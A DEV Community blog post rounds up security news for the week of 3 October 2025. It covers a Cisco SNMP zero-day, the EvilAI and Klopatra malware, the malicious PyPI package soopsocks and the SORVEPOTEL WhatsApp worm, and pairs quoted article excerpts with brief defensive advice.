DEV Community

Cover image for Security news weekly round-up - 3rd October 2025
Habdul Hazeez
Habdul Hazeez

Posted on

Security news weekly round-up - 3rd October 2025

As things stand, a world where malware and vulnerabilities do not exist is a distant future. Who knows? We might have a solution to these two predominant threats one day. Hopefully, you and I are alive to witness that day. Until then, we have to keep ourselves educated about them and give credit to malware and vulnerability researchers.

I am pretty sure you already know what we are about to review. Let's begin.


As many as 2 million Cisco devices affected by actively exploited 0-day

The good news: It appears that Cisco patched the bug as part of their September 2025 update. The not-so-good news: A search on Shodan reveals that 2 million devices are vulnerable because they are exposed to the internet.

More about the vulnerability from the article:

The vulnerability is the result of a stack overflow bug in the IOS component that handles SNMP (simple network management protocol), which routers and other devices use to collect and handle information about devices inside a network. The vulnerability is exploited by sending crafted SNMP packets.

EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Deception is one of the weapons of the attackers in this campaign. Also, the attackers use valid digital signatures, making it difficult for users and security tools to distinguish the malware from legitimate software.

From the article:

The campaign has been codenamed EvilAI by Trend Micro, describing the attackers behind the operation as "highly capable" owing to their ability to blur the line between authentic and deceptive software for malware distribution and their ability to conceal its malicious features in otherwise functional applications.

The end goal of the campaign is to conduct extensive reconnaissance, exfiltrate sensitive browser data, and maintain encrypted, real-time communication with its command-and-control (C2) servers using AES-encrypted channels to receive attacker commands and deploy additional payloads.

Android malware uses VNC to give attackers hands-on access

The purpose of this malware is to steal banking credentials. Also, at the time of writing, it does not appear to be connected to any Android malware families. And yes, it abuses the Android Accessibility Services. So, when an application on your phone requests such services, think twice before granting it access.

From the article:

Although the operators of the malware use Cloudflare to hide their digital tracks, a misconfiguration exposed origin IP addresses, which allowed linking the C2 servers to the same provider.

Since March 2025, when Klopatra first appeared in the wild, there have been 40 distinct builds, a sign of active development and quick evolution for the new Android trojan.

Alert: Malicious PyPI Package soopsocks Infects 2,653 Systems Before Takedown

If you downloaded the affected package before it was taken down, here is my advice for you: remove it now. Also, it won't hurt to perform a routine security scan of your system.

Here is what the researchers said about the package:

"soopsocks is a well-designed SOCKS5 proxy with full bootstrap Windows support.

"However, given the way it performs and actions it takes during runtime, it shows signs of malicious activity, such as firewall rules, elevated permissions, various PowerShell commands, and the transfer from simple, configurable Python scripts to a Go executable with hardcoded parameters, version with reconnaissance capabilities..."

Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL

At the time of writing, most infections are in Brazil. Now, you might ask: Then why are we talking about it? We are talking about it because the attackers are using phishing to get it onto people's systems. This should serve as a reminder that you should watch out for phishing emails at all times.

From the article:

The starting point of the attack is a phishing message sent from an already compromised contact on WhatsApp to lend it a veneer of credibility. The message contains a ZIP attachment that masquerades as a seemingly harmless receipt or health app-related file.

Should the recipient fall for the trick and open the attachment, they are lured into opening a Windows shortcut (LNK) file that, when launched, silently triggers the execution of a PowerShell script responsible for retrieving the main payload from an external server (e.g., sorvetenopoate[.]com).

Credits

Cover photo by Debby Hudson on Unsplash.


That's it for this week, and I'll see you next time.

Top comments (0)